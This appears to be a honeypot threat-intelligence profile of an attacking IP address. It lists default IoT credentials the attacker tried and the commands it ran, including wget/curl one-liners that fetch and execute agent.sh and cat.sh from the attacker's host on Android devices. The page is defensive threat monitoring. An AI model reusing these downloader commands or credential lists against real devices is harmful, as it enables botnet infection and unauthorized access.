Active Threat β’ HIGH
130.12.180.85
π―
715
Total Attacks
π
3
Ports
π‘
3
Attack Types
π¦
3
Malware
Geolocation
- Country
- πΊπΈ United States
- City
- Unknown
- ASN
- AS214943
- ISP
- Railnet LLC
Attack Types
cowrie
adbhoney
honeytrap
Attacked Ports
2322225555
Associated Malware
Attempted Credentials
πadmin/admin
11xπroot/(empty)
11xπroot/root
11xπuser/user
8xπtelecomadmin/admintelecom
6xπhikvision/hikvision
6xπroot/xc3511
6xπadmin/password
5xπpi/raspberry
5xπadmin/admin1234
5xπroot/86981198
5xπubnt/ubnt
5xπroot/j1/_6s*w
5xπadmin/12345
5xπdefault/default
5xExecuted Commands
$
./10x$
echo SHELL_TEST7x$
cat /proc6x$
/bin/busybox TEST6x$
cd /data/local/tmp/; wget http://130.12.180.85/agent.sh || curl http://130.12.180.85/agent.sh -o agent.sh; chmod 777 agent.sh; sh agent.sh android1x$
cd /data/local/tmp/; wget http://130.12.180.85/cat.sh || curl http://130.12.180.85/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android1xRisk Assessment
72
/100
LowMediumHighCritical